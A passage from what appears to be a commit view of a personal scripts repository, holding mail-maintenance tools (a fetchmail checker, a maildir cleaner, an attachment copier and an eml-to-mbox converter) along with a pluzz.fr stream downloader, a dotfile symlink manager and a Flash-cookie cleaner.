os.chmod(self.path, 0400)
class LocalException(Exception):
"""Root of local exception class hierarchy."""
pass
class LossyConversionException(LocalException):
"Exception thrown when a lossy WC format conversion is requested."
def __init__(self, lossy_fields, str):
self.lossy_fields = lossy_fields
self.str = str
def __str__(self):
return self.str
class UnrecognizedWCFormatException(LocalException):
def __init__(self, format, path):
self.format = format
self.path = path
def __str__(self):
return ("Unrecognized WC format %d in '%s'; "
"only formats 8, 9, and 10 can be supported") % (self.format, self.path)
def main():
try:
opts, args = my_getopt(sys.argv[1:], "vh?",
["debug", "force", "skip-unknown-format",
"verbose", "help"])
except:
usage_and_exit("Unable to process arguments/options")
converter = WCFormatConverter()
# Process arguments.
if len(args) == 2:
converter.root_path = args[0]
svn_version = args[1]
else:
usage_and_exit()
# Process options.
debug = False
for opt, value in opts:
if opt in ("--help", "-h", "-?"):
usage_and_exit()
elif opt == "--force":
converter.force = True
elif opt == "--skip-unknown-format":
converter.error_on_unrecognized = False
elif opt in ("--verbose", "-v"):
converter.verbosity += 1
elif opt == "--debug":
debug = True
else:
usage_and_exit("Unknown option '%s'" % opt)
try:
new_format_nbr = LATEST_FORMATS[svn_version]
except KeyError:
usage_and_exit("Unsupported version number '%s'; "
"only 1.4, 1.5, and 1.6 can be supported" % svn_version)
try:
converter.change_wc_format(new_format_nbr)
except LocalException, e:
if debug:
raise
sys.stderr.write("%s\n" % e)
sys.stderr.flush()
sys.exit(1)
print("Converted WC at '%s' into format %d for Subversion %s" % \
(converter.root_path, new_format_nbr, svn_version))
if __name__ == "__main__":
main()

14
check_fetchmail Executable file
View File

@ -0,0 +1,14 @@
#!/bin/sh
LOGFILE=/shared/meutel/fetchmail.log
# check fetchmail running as daemon
if [ ! `pgrep fetchmail` ]; then
echo "fetchmail is not running"
fi
# check error in log
grep -3 error $LOGFILE
# clear log
echo > $LOGFILE

5
clean_flash_cookies.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/sh
FLASH_COOKIES_PATH=$HOME/.macromedia/
rm -rf $FLASH_COOKIES_PATH

533
cleanup-maildir Executable file
View File

@ -0,0 +1,533 @@
#!/usr/bin/python -tt
#
# Copyright 2004-2006 Nathaniel W. Turner <nate@houseofnate.net>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
USAGE
cleanup-maildir [OPTION].. COMMAND FOLDERNAME..
DESCRIPTION
Cleans up old messages in FOLDERNAME; the exact action taken
depends on COMMAND. (See next section.)
Note that FOLDERNAME is a name such as 'Drafts', and the
corresponding maildir path is determined using the values of
maildir-root, folder-prefix, and folder-seperator.
COMMANDS
archive - move old messages to subfolders based on message date
trash - move old message to trash folder
delete - permanently delete old messages
OPTIONS
-h, --help
Show this help.
-q, --quiet
Suppress normal output.
-v, --verbose
Output extra information for testing.
-n, --trial-run
Do not actually touch any files; just say what would be done.
-a, --age=N
Only touch messages older than N days. Default is 14 days.
-k, --keep-flagged-threads
If any messages in a thread are flagged, do not touch them or
any other messages in that thread.
Note: the thread-detection mechanism is currently base purely on
a message's subject. The In-Reply-To header is not currently used.
-r, --keep-read
If any messages are flagged as READ, do not touch them.
-t, --trash-folder=F
Use F as trash folder when COMMAND is 'trash'.
Default is 'Trash'.
--archive-folder=F
Use F as the base for constructing archive folders. For example, if F is
'Archive', messages from 2004 might be put in the folder 'Archive.2004'.
-d, --archive-hierarchy-depth=N
Specify number of subfolders in archive hierarchy; 1 is just
the year, 2 is year/month (default), 3 is year/month/day.
--maildir-root=F
Specifies folder that contains mail folders.
Default is "$HOME/Maildir".
--folder-seperator=str
Folder hierarchy seperator. Default is '.'
--folder-prefix=str
Folder prefix. Default is '.'
NOTES
The following form is accepted for backwards compatibility, but is deprecated:
cleanup-maildir --mode=COMMAND [OPTION].. FOLDERNAME..
EXAMPLES
# Archive messages in 'Sent Items' folder over 30 days old
cleanup-maildir --age=30 archive 'Sent Items'"
# Delete messages over 2 weeks old in 'Lists/debian-devel' folder,
# except messages that are part of a thread containing a flagged message.
cleanup-maildir --keep-flagged-threads trash 'Lists.debian-devel'
"""
__version__ = "0.3.0"
# $Id$
# $URL$
import mailbox
import os.path
import os
import rfc822
import string
import socket
import time
import logging
import sys
import getopt
def mkMaildir(path):
"""Make a Maildir structure rooted at 'path'"""
os.mkdir(path, 0700)
os.mkdir(os.path.join(path, 'tmp'), 0700)
os.mkdir(os.path.join(path, 'new'), 0700)
os.mkdir(os.path.join(path, 'cur'), 0700)
class MaildirWriter(object):
"""Deliver messages into a Maildir"""
path = None
counter = 0
def __init__(self, path=None):
"""Create a MaildirWriter that manages the Maildir at 'path'
Arguments:
path -- if specified, used as the default Maildir for this object
"""
if path != None:
if not os.path.isdir(path):
raise ValueError, 'Path does not exist: %s' % path
self.path = path
self.logger = logging.getLogger('MaildirWriter')
def deliver(self, msg, path=None):
"""Deliver a message to a Maildir
Arguments:
msg -- a message object
path -- the path of the Maildir; if None, uses default from __init__
"""
if path != None:
self.path = path
if self.path == None or not os.path.isdir(self.path):
raise ValueError, 'Path does not exist'
tryCount = 1
srcFile = msg.getFilePath();
(dstName, tmpFile, newFile, dstFile) = (None, None, None, None)
while 1:
try:
dstName = "%d.%d_%d.%s" % (int(time.time()), os.getpid(),
self.counter, socket.gethostname())
tmpFile = os.path.join(os.path.join(self.path, "tmp"), dstName)
newFile = os.path.join(os.path.join(self.path, "new"), dstName)
self.logger.debug("deliver: attempt copy %s to %s" %
(srcFile, tmpFile))
os.link(srcFile, tmpFile) # Copy into tmp
self.logger.debug("deliver: attempt link to %s" % newFile)
os.link(tmpFile, newFile) # Link into new
except OSError, (n, s):
self.logger.critical(
"deliver failed: %s (src=%s tmp=%s new=%s i=%d)" %
(s, srcFile, tmpFile, newFile, tryCount))
self.logger.info("sleeping")
time.sleep(2)
tryCount += 1
self.counter += 1
if tryCount > 10:
raise OSError("too many failed delivery attempts")
else:
break
# Successful delivery; increment deliver counter
self.counter += 1
# For the rest of this method we are acting as an MUA, not an MDA.
# Move message to cur and restore any flags
dstFile = os.path.join(os.path.join(self.path, "cur"), dstName)
if msg.getFlags() != None:
dstFile += ':' + msg.getFlags()
self.logger.debug("deliver: attempt link to %s" % dstFile)
os.link(newFile, dstFile)
os.unlink(newFile)
# Cleanup tmp file
os.unlink(tmpFile)
class MessageDateError(TypeError):
"""Indicate that the message date was invalid"""
pass
class MaildirMessage(rfc822.Message):
"""An email message
Has extra Maildir-specific attributes
"""
def getFilePath(self):
if sys.hexversion >= 0x020500F0:
return self.fp._file.name
else:
return self.fp.name
def isFlagged(self):
"""return true if the message is flagged as important"""
import re
fname = self.getFilePath()
if re.search(r':.*F', fname) != None:
return True
return False
def getFlags(self):
"""return the flag part of the message's filename"""
parts = self.getFilePath().split(':')
if len(parts) == 2:
return parts[1]
return None
def isNew(self):
"""return true if the message is marked as unread"""
# XXX should really be called isUnread
import re
fname = self.getFilePath()
if re.search(r':.*S', fname) != None:
return False
return True
def getSubject(self):
"""get the message's subject as a unicode string"""
import email.Header
s = self.getheader("Subject")
try:
return u"".join(map(lambda x: x[0].decode(x[1] or 'ASCII', 'replace'),
email.Header.decode_header(s)))
except(LookupError):
return s
def getSubjectHash(self):
"""get the message's subject in a "normalized" form
This currently means lowercasing and removing any reply or forward
indicators.
"""
import re
import string
s = self.getSubject()
if s == None:
return '(no subject)'
return re.sub(r'^(re|fwd?):\s*', '', string.strip(s.lower()))
def getDateSent(self):
"""Get the time of sending from the Date header
Returns a time object using time.mktime. Not very reliable, because
the Date header can be missing or spoofed (and often is, by spammers).
Throws a MessageDateError if the Date header is missing or invalid.
"""
dh = self.getheader('Date')
if dh == None:
return None
try:
return time.mktime(rfc822.parsedate(dh))
except ValueError:
raise MessageDateError("message has missing or bad Date")
except TypeError: # gets thrown by mktime if parsedate returns None
raise MessageDateError("message has missing or bad Date")
except OverflowError:
raise MessageDateError("message has missing or bad Date")
def getDateRecd(self):
"""Get the time the message was received"""
# XXX check that stat returns time in UTC, fix if not
return os.stat(self.getFilePath())[8]
def getDateSentOrRecd(self):
"""Get the time the message was sent, fall back on time received"""
try:
d = self.getDateSent()
if d != None:
return d
except MessageDateError:
pass
return self.getDateRecd()
def getAge(self):
"""Get the number of seconds since the message was received"""
msgTime = self.getDateRecd()
msgAge = time.mktime(time.gmtime()) - msgTime
return msgAge / (60*60*24)
class MaildirCleaner(object):
"""Clean a maildir by deleting or moving old messages"""
__trashWriter = None
__mdWriter = None
stats = {'total': 0, 'delete': 0, 'trash': 0, 'archive': 0}
keepSubjects = {}
archiveFolder = None
archiveHierDepth = 2
folderBase = None
folderPrefix = "."
folderSeperator = "."
keepFlaggedThreads = False
trashFolder = "Trash"
isTrialRun = False
keepRead = False
def __init__(self, folderBase=None):
"""Initialize the MaildirCleaner
Arguments:
folderBase -- the directory in which the folders are found
"""
self.folderBase = folderBase
self.__mdWriter = MaildirWriter()
self.logger = logging.getLogger('MaildirCleaner')
self.logger.setLevel(logging.DEBUG)
def __getTrashWriter(self):
if not self.__trashWriter:
path = os.path.join(self.folderBase, self.folderPrefix + self.trashFolder)
self.__trashWriter = MaildirWriter(path)
return self.__trashWriter
trashWriter = property(__getTrashWriter)
def scanSubjects(self, folderName):
"""Scans for flagged subjects"""
self.logger.info("Scanning for flagged subjects...")
if (folderName == 'INBOX'):
path = self.folderBase
else:
path = os.path.join(self.folderBase, self.folderPrefix + folderName)
maildir = mailbox.Maildir(path, MaildirMessage)
self.keepSubjects = {}
for i, msg in enumerate(maildir):
if msg.isFlagged():
self.keepSubjects[msg.getSubjectHash()] = 1
self.logger.debug("Flagged (%d): %s", i, msg.getSubjectHash())
self.logger.info("Done scanning.")
def clean(self, mode, folderName, minAge):
"""Trashes or archives messages older than minAge days
Arguments:
mode -- the cleaning mode. Valid modes are:
trash -- moves the messages to a trash folder
archive -- moves the messages to folders based on their date
delete -- deletes the messages
folderName -- the name of the folder on which to operate
This is a name like "Stuff", not a filename
minAge -- messages younger than minAge days are left alone
"""
if not mode in ('trash', 'archive', 'delete'):
raise ValueError
if (self.keepFlaggedThreads):
self.scanSubjects(folderName)
archiveFolder = self.archiveFolder
if (archiveFolder == None):
if (folderName == 'INBOX'):
archiveFolder = ""
else:
archiveFolder = folderName
if (folderName == 'INBOX'):
path = self.folderBase
else:
path = os.path.join(self.folderBase, self.folderPrefix + folderName)
maildir = mailbox.Maildir(path, MaildirMessage)
fakeMsg = ""
if self.isTrialRun:
fakeMsg = "(Not really) "
# Move old messages
for i, msg in enumerate(maildir):
if self.keepFlaggedThreads == True \
and msg.getSubjectHash() in self.keepSubjects:
self.log(logging.DEBUG, "Keeping #%d (topic flagged)" % i, msg)
else:
if (msg.getAge() >= minAge) and ((not self.keepRead) or (self.keepRead and msg.isNew())):
if mode == 'trash':
self.log(logging.INFO, "%sTrashing #%d (old)" %
(fakeMsg, i), msg)
if not self.isTrialRun:
self.trashWriter.deliver(msg)
os.unlink(msg.getFilePath())
elif mode == 'delete':
self.log(logging.INFO, "%sDeleting #%d (old)" %
(fakeMsg, i), msg)
if not self.isTrialRun:
os.unlink(msg.getFilePath())
else: # mode == 'archive'
# Determine subfolder path
mdate = time.gmtime(msg.getDateSentOrRecd())
datePart = str(mdate[0])
if self.archiveHierDepth > 1:
datePart += self.folderSeperator \
+ time.strftime("%m", mdate)
if self.archiveHierDepth > 2:
datePart += self.folderSeperator \
+ time.strftime("%d", mdate)
subFolder = archiveFolder + self.folderSeperator \
+ datePart
sfPath = os.path.join(self.folderBase,
self.folderPrefix + subFolder)
self.log(logging.INFO, "%sArchiving #%d to %s" %
(fakeMsg, i, subFolder), msg)
if not self.isTrialRun:
# Create the subfolder if needed
if not os.path.exists(sfPath):
mkMaildir(sfPath)
# Deliver
self.__mdWriter.deliver(msg, sfPath)
os.unlink(msg.getFilePath())
self.stats[mode] += 1
else:
self.log(logging.DEBUG, "Keeping #%d (fresh)" % i, msg)
self.stats['total'] += 1
def log(self, lvl, text, msgObj):
"""Log some text with the subject of a message"""
subj = msgObj.getSubject()
if subj == None:
subj = "(no subject)"
self.logger.log(lvl, text + ": " + subj)
# Defaults
minAge = 14
mode = None
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
logging.disable(logging.INFO - 1)
logger = logging.getLogger('cleanup-maildir')
cleaner = MaildirCleaner()
# Read command-line arguments
try:
opts, args = getopt.getopt(sys.argv[1:],
"hqvnrm:t:a:kd:",
["help", "quiet", "verbose", "version", "mode=", "trash-folder=",
"age=", "keep-flagged-threads", "keep-read", "folder-seperator=",
"folder-prefix=", "maildir-root=", "archive-folder=",
"archive-hierarchy-depth=", "trial-run"])
except getopt.GetoptError, (msg, opt):
logger.error("%s\n\n%s" % (msg, __doc__))
sys.exit(2)
output = None
for o, a in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
if o in ("-q", "--quiet"):
logging.disable(logging.WARNING - 1)
if o in ("-v", "--verbose"):
logging.disable(logging.DEBUG - 1)
if o == "--version":
print __version__
sys.exit()
if o in ("-n", "--trial-run"):
cleaner.isTrialRun = True
if o in ("-m", "--mode"):
logger.warning("the --mode flag is deprecated (see --help)")
if a in ('trash', 'archive', 'delete'):
mode = a
else:
logger.error("%s is not a valid command" % a)
sys.exit(2)
if o in ("-t", "--trash-folder"):
cleaner.trashFolder = a
if o == "--archive-folder":
cleaner.archiveFolder = a
if o in ("-a", "--age"):
minAge = int(a)
if o in ("-k", "--keep-flagged-threads"):
cleaner.keepFlaggedThreads = True
if o in ("-r", "--keep-read"):
cleaner.keepRead = True
if o == "--folder-seperator":
cleaner.folderSeperator = a
if o == "--folder-prefix":
cleaner.folderPrefix = a
if o == "--maildir-root":
cleaner.folderBase = a
if o in ("-d", "--archive-hierarchy-depth"):
archiveHierDepth = int(a)
if archiveHierDepth < 1 or archiveHierDepth > 3:
sys.stderr.write("Error: archive hierarchy depth must be 1, " +
"2, or 3.\n")
sys.exit(2)
cleaner.archiveHierDepth = archiveHierDepth
if not cleaner.folderBase:
cleaner.folderBase = os.path.join(os.environ["HOME"], "Maildir")
if mode == None:
if len(args) < 1:
logger.error("No command specified")
sys.stderr.write(__doc__)
sys.exit(2)
mode = args.pop(0)
if not mode in ('trash', 'archive', 'delete'):
logger.error("%s is not a valid command" % mode)
sys.exit(2)
if len(args) == 0:
logger.error("No folder(s) specified")
sys.stderr.write(__doc__)
sys.exit(2)
logger.debug("Mode is " + mode)
# Clean each folder
for dir in args:
logger.debug("Cleaning up %s..." % dir)
cleaner.clean(mode, dir, minAge)
logger.info('Total messages: %5d' % cleaner.stats['total'])
logger.info('Affected messages: %5d' % cleaner.stats[mode])
logger.info('Untouched messages: %5d' %
(cleaner.stats['total'] - cleaner.stats[mode]))

96
copy-to-dir.sh Executable file
View File

@ -0,0 +1,96 @@
#!/bin/sh
#
# Copyright (c) 2010 Mary Gardiner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
## INFO
# This is a very simple script designed to be used when using the email client
# mutt remotely. It copies attachments to a web accessible folder and tells you
# where to view them.
#
# More details are available at http://puzzling.org/logs/thoughts/2010/May/6/mutt-attachments
# if you want to override OUTPUTDIR and VIEWINGDIR edit them here or create a
# ~/.copy-to-dir # file that looks like:
# OUTPUTDIR=someotherdir
# VIEWINGDIR=someother URI
# You can also optionally specify a location to rsync attachments to,
# RSYNCOUTPUTDIR=host:dir
# You'll probably want a passphraseless key for this and NO DELETION of rsynced
# attachments will take place.
### Extension
# use short generated file name
OUTPUTDIR=$HOME/public_html/attachments
VIEWINGDIR=https://ssl.meutel.net/~meutel/attachments
CONFIGFILE=$HOME/.copy-to-dir
if [ -e "$CONFIGFILE" ]
then
. "$CONFIGFILE"
fi
if [ -n "$1" ]
then
if [ -n "$RSYNCOUTPUTDIR" ]
then
SHORTNAME=`basename "$1"`
echo "Uploading attachment $SHORTNAME for viewing"
rsync --chmod=ugo+r --progress -ptve "ssh -C" "$1" "$RSYNCOUTPUTDIR"
echo
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME"
elif [ ! -d "$OUTPUTDIR" ]
then
echo "ERROR: '$OUTPUTDIR' doesn't exist, or is not a directory"
else
SHORTNAME=`md5sum "$1" | cut -c -4`
DELETE="$OUTPUTDIR/$SHORTNAME"
cp "$1" "$DELETE"
chmod 644 "$DELETE"
# ajoute le type mime dans les attributs etendus
MIME_TYPE=`file -b --mime-type "$DELETE"`
attr -s Content-Type -V "$MIME_TYPE" $DELETE
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME"
fi
fi
# From http://www.unix.com/unix-dummies-questions-answers/5961-wait-input.html
if [ -n "RSYNCOUTPUTDIR" ]
then
echo "Press any key to continue\c"
elif [ -n "$DELETE" ]
then
echo "Press any key to continue, and delete viewable attachment\c"
else
echo "No attachment specified, press any key to continue\c"
fi
oldstty=$(stty -g)
stty -icanon -echo min 1 time 0
dd bs=1 count=1 2>/dev/null
stty "$oldstty"
if [ -n "$DELETE" ]
then
rm $DELETE
fi

57
dl_pluzz Executable file
View File

@ -0,0 +1,57 @@
#!/bin/bash
# Script pour utiliser pluzz.fr
# v0.2 (11 juillet 2010)
if [ $# != 2 ]
then
printf "Syntaxe: $0 [url|play|record] http://www.pluzz.fr/...\n" >&2
exit 1
fi
command="$1"
url="$2"
if [ "$command" != 'url' -a "$command" != 'play' -a "$command" != 'record' ]
then
printf "Command must be 'url', 'play' or 'record', not '$command'\n" >&2
exit 2
fi
video_page_url=$(wget -qO- "$url" | grep -o 'http://info.francetelevisions.fr/?id-video=[^"]\+')
stream_url_part2=$(wget -qO- "$video_page_url" | grep urls-url-video | sed 's/.*content="\(.*\)".*/\1/')
ext=${stream_url_part2##*.}
if [ "$ext" = 'wmv' ]
then
stream_url_part1='mms://a988.v101995.c10199.e.vm.akamaistream.net/7/988/10199/3f97c7e6/ftvigrp.download.akamai.com/10199/cappuccino/production/publication'
elif [ "$ext" = 'mp4' ]
then
stream_url_part1='rtmp://videozones-rtmp.francetv.fr/ondemand/mp4:cappuccino/publication'
else
printf "Extension not managed : '$ext'\n" >&2
exit 3
fi
stream_url="$stream_url_part1/$stream_url_part2"
if [ "$command" = "url" ]
then
printf "$stream_url\n"
elif [ "$command" = "play" ]
then
if [ "$ext" = 'wmv' ]
then
vlc "$stream_url"
else
flvstreamer -r "$stream_url" | vlc -
fi
elif [ "$command" = "record" ]
then
output_file=${stream_url##*/}
printf "Recording to $output_file...\n"
if [ "$ext" = 'wmv' ]
then
vlc "$stream_url" ":sout=#std{access=file,mux=asf,dst=$output_file}"
else
flvstreamer -r "$stream_url" -o "$output_file"
fi
fi

204
dotfile-manager Executable file
View File

@ -0,0 +1,204 @@
#!/usr/bin/env python2
"""dotfilemanager.py - a dotfiles manager script. See --help for usage
and command-line arguments.
"""
import os,sys,platform
# TODO: allow setting hostname as a command-line argument also?
try:
HOSTNAME = os.environ['DOTFILEMANAGER_HOSTNAME']
except KeyError:
HOSTNAME = platform.node()
HOSTNAME_SEPARATOR = '__'
def tidy(d,report=False):
"""Find and delete any broken symlinks in directory d.
Arguments:
d -- The directory to consider (absolute path)
Keyword arguments:
report -- If report is True just report on what broken symlinks are
found, don't attempt to delete them (default: False)
"""
for f in os.listdir(d):
path = os.path.join(d,f)
if os.path.islink(path):
target_path = os.readlink(path)
target_path = os.path.abspath(os.path.expanduser(target_path))
if not os.path.exists(target_path):
# This is a broken symlink.
if report:
print 'tidy would delete broken symlink: %s->%s' % (path,target_path)
else:
print 'Deleting broken symlink: %s->%s' % (path,target_path)
os.remove(path)
def get_target_paths(to_dir,report=False):
"""Return the list of absolute paths to link to for a given to_dir.
This handles skipping various types of filename in to_dir and
resolving host-specific filenames.
"""
paths = []
filenames = os.listdir(to_dir)
for filename in filenames:
path = os.path.join(to_dir,filename)
if filename.endswith('~'):
if report:
print 'Skipping %s' % filename
continue
elif (not os.path.isfile(path)) and (not os.path.isdir(path)):
if report:
print 'Skipping %s (not a file or directory)' % filename
continue
elif filename.startswith('.'):
if report:
print 'Skipping %s (filename has a leading dot)' % filename
continue
else:
if HOSTNAME_SEPARATOR in filename:
# This appears to be a filename with a trailing
# hostname, e.g. _muttrc__dulip. If the trailing
# hostname matches the hostname of this host then we
# link to it.
hostname = filename.split(HOSTNAME_SEPARATOR)[-1]
if hostname == HOSTNAME:
paths.append(path)
else:
if report:
print 'Skipping %s (different hostname)' % filename
continue
else:
# This appears to be a filename without a trailing
# hostname.
if filename + HOSTNAME_SEPARATOR + HOSTNAME in filenames:
if report:
print 'Skipping %s (there is a host-specific version of this file for this host)' % filename
continue
else:
paths.append(path)
return paths
def link(from_dir,to_dir,report=False):
"""Make symlinks in from_dir to each file and directory in to_dir.
This handles converting leading underscores in to_dir to leading
dots in from_dir.
Arguments:
from_dir -- The directory in which symlinks will be created (string,
absolute path)
to_dir -- The directory containing the files and directories that
will be linked to (string, absolute path)
Keyword arguments:
report -- If report is True then only report on the status of
symlinks in from_dir, don't actually create any new
symlinks (default: False)
"""
# The paths in to_dir that we will be symlinking to.
to_paths = get_target_paths(to_dir,report)
# Dictionary of symlinks we will be creating, from_path->to_path
symlinks = {}
for to_path in to_paths:
to_directory, to_filename = os.path.split(to_path)
# Change leading underscores to leading dots.
if to_filename.startswith('_'):
from_filename = '.' + to_filename[1:]
else:
from_filename = to_filename
# Remove hostname specifiers.
parts = from_filename.split(HOSTNAME_SEPARATOR)
assert len(parts) == 1 or len(parts) == 2
from_filename = parts[0]
from_path = os.path.join(from_dir,from_filename)
symlinks[from_path] = to_path
# Attempt to create the symlinks that don't already exist.
for from_path,to_path in symlinks.items():
# Check that nothing already exists at from_path.
if os.path.islink(from_path):
# A link already exists.
existing_to_path = os.readlink(from_path)
existing_to_path = os.path.abspath(os.path.expanduser(existing_to_path))
if existing_to_path == to_path:
# It's already a link to the intended target. All is
# well.
continue
else:
# It's a link to somewhere else.
print from_path+" => is already symlinked to "+existing_to_path
elif os.path.isfile(from_path):
print "There's a file in the way at "+from_path
elif os.path.isdir(from_path):
print "There's a directory in the way at "+from_path
elif os.path.ismount(from_path):
print "There's a mount point in the way at "+from_path
else:
# The path is clear, make the symlink.
if report:
print 'link would make symlink: %s->%s' % (from_path,to_path)
else:
print 'Making symlink %s->%s' % (from_path,to_path)
os.symlink(to_path,from_path)
def usage():
return """Usage:
dotfilemanager link|tidy|report [FROM_DIR [TO_DIR]]
Commands:
link -- make symlinks in FROM_DIR to files and directories in TO_DIR
tidy -- remove broken symlinks from FROM_DIR
report -- report on symlinks in FROM_DIR and files and directories in TO_DIR
FROM_DIR defaults to ~ and TO_DIR defaults to ~/.dotfiles.
"""
if __name__ == "__main__":
try:
ACTION = sys.argv[1]
except IndexError:
print usage()
sys.exit(2)
try:
FROM_DIR = sys.argv[2]
except IndexError:
FROM_DIR = '~'
FROM_DIR = os.path.abspath(os.path.expanduser(FROM_DIR))
if not os.path.isdir(FROM_DIR):
print "FROM_DIR %s is not a directory!" % FROM_DIR
print usage()
sys.exit(2)
if ACTION == 'tidy':
tidy(FROM_DIR)
else:
try:
TO_DIR = sys.argv[3]
except IndexError:
TO_DIR = os.path.join('~','.dotfiles')
TO_DIR = os.path.abspath(os.path.expanduser(TO_DIR))
if not os.path.isdir(TO_DIR):
print "TO_DIR %s is not a directory!" % TO_DIR
print usage()
sys.exit(2)
if ACTION == 'link':
link(FROM_DIR,TO_DIR)
elif ACTION == 'report':
link(FROM_DIR,TO_DIR,report=True)
tidy(FROM_DIR,report=True)
else:
print usage()
sys.exit(2)

265
eml2mbox.rb Executable file
View File

@ -0,0 +1,265 @@
#!/usr/bin/ruby
#============================================================================================#
# eml2mbox.rb v0.08 #
# Last updated: Jan 23, 2004 #
# #
# Converts a bunch of eml files into one mbox file. #
# #
# Usage: [ruby] eml2mbx.rb [-c] [-l] [-s] [-yz] [emlpath [trgtmbx]] #
# Switches: #
# -c Remove CRs (^M) appearing at end of lines (Unix) #
# -l Remove LFs appearing at beggining of lines (old Mac) - not tested #
# -s Don't use standard mbox postmark formatting (for From_ line) #
# This will force the use of original From and Date found in mail headers. #
# Not recommended, unless you really have problems importing emls. #
# -yz Use this to force the order of the year and timezone in date in the From_ #
# line from the default [timezone][year] to [year][timezone]. #
# emlpath - Path of dir with eml files. Defaults to the current dir if not specified #
# trgtmbx - Name of the target mbox file. Defaults to "archive.mbox" in 'emlpath' #
# #
# Ruby homepage: http://www.ruby-lang.org/en/ #
# Unix mailbox format: http://www.broobles.com/eml2mbox/mbox.html #
# This script : http://www.broobles.com/eml2mbox #
# #
#============================================================================================#
# Licence: #
# #
# This script is free software; you can redistribute it and/or modify it under the terms of #
# the GNU Lesser General Public License as published by the Free Software Foundation; #
# either version 2.1 of the License, or (at your option) any later version. #
# #
# You should have received a copy of the GNU Lesser General Public License along with this #
# script; if not, please visit http://www.gnu.org/copyleft/gpl.html for more information. #
#============================================================================================#
require "parsedate"
include ParseDate
#=======================================================#
# Class that encapsulates the processing file in memory #
#=======================================================#
class FileInMemory
ZoneOffset = {
# Standard zones by RFC 2822
'UTC' => '0000',
'UT' => '0000', 'GMT' => '0000',
'EST' => '-0500', 'EDT' => '-0400',
'CST' => '-0600', 'CDT' => '-0500',
'MST' => '-0700', 'MDT' => '-0600',
'PST' => '-0800', 'PDT' => '-0700',
}
def initialize()
@lines = Array.new
@counter = 1 # keep the 0 position for the From_ line
@from = nil # from part of the From_ line
@date = nil # date part of the From_ line
end
def addLine(line)
# If the line is a 'false' From line, add a '>' to its beggining
line = line.sub(/From/, '>From') if line =~ /^From/ and @from!=nil
# If the line is the first valid From line, save it (without the line break)
if line =~ /^From:\s.*@/ and @from==nil
@from = line.sub(/From:/,'From')
@from = @from.chop # Remove line break(s)
@from = standardizeFrom(@from) unless $switches["noStandardFromLine"]
end
# Get the date
if $switches["noStandardFromLine"]
# Don't parse the content of the Date header
@date = line.sub(/Date:\s/,'') if line =~ /^Date:\s/ and @date==nil
else
if line =~ /^Date:\s/ and @date==nil
# Parse content of the Date header and convert to the mbox standard for the From_ line
@date = line.sub(/Date:\s/,'')
year, month, day, hour, minute, second, timezone, wday = parsedate(@date)
# Need to convert the timezone from a string to a 4 digit offset
unless timezone =~ /[+|-]\d*/
timezone=ZoneOffset[timezone]
end
time = Time.gm(year,month,day,hour,minute,second)
@date = formMboxDate(time,timezone)
end
end
# Now add the line to the array
line = fixLineEndings(line)
@lines[@counter]=line
@counter+=1
end
# Forms the first line (from + date) and returns all the lines
# Returns all the lines in the file
def getProcessedLines()
if @from != nil
# Add from and date to the first line
if @date==nil
puts "WARN: Failed to extract date. Will use current time in the From_ line"
@date=formMboxDate(Time.now,nil)
end
@lines[0] = @from + " " + @date
@lines[0] = fixLineEndings(@lines[0])
@lines[@counter] = ""
return @lines
end
# else don't return anything
end
# Fixes CR/LFs
def fixLineEndings(line)
line = removeCR(line) if $switches["removeCRs"];
line = removeLF(line) if $switches["removeLFs"];
return line
end
# emls usually have CR+LF (DOS) line endings, Unix uses LF as a line break,
# so there's a hanging CR at the end of the line when viewed on Unix.
# This method will remove the next to the last character from a line
def removeCR(line)
line = line[0..-3]+line[-1..-1] if line[-2]==0xD
return line
end
# Similar to the above. This one is for Macs that use CR as a line break.
# So, remove the last char
def removeLF(line)
line = line[0..-2] if line[-1]==0xA
return line
end
end
#================#
# Helper methods #
#================#
# Converts: 'From "some one <aa@aa.aa>" <aa@aa.aa>' -> 'From aa@aa.aa'
def standardizeFrom(fromLine)
# Get indexes of last "<" and ">" in line
openIndex = fromLine.rindex('<')
closeIndex = fromLine.rindex('>')
if openIndex!=nil and closeIndex!=nil
fromLine = fromLine[0..4]+fromLine[openIndex+1..closeIndex-1]
end
# else leave as it is - it is either already well formed or is invalid
return fromLine
end
# Returns a mbox postmark formatted date.
# If timezone is unknown, it is skipped.
# mbox date format used is described here:
# http://www.broobles.com/eml2mbox/mbox.html
def formMboxDate(time,timezone)
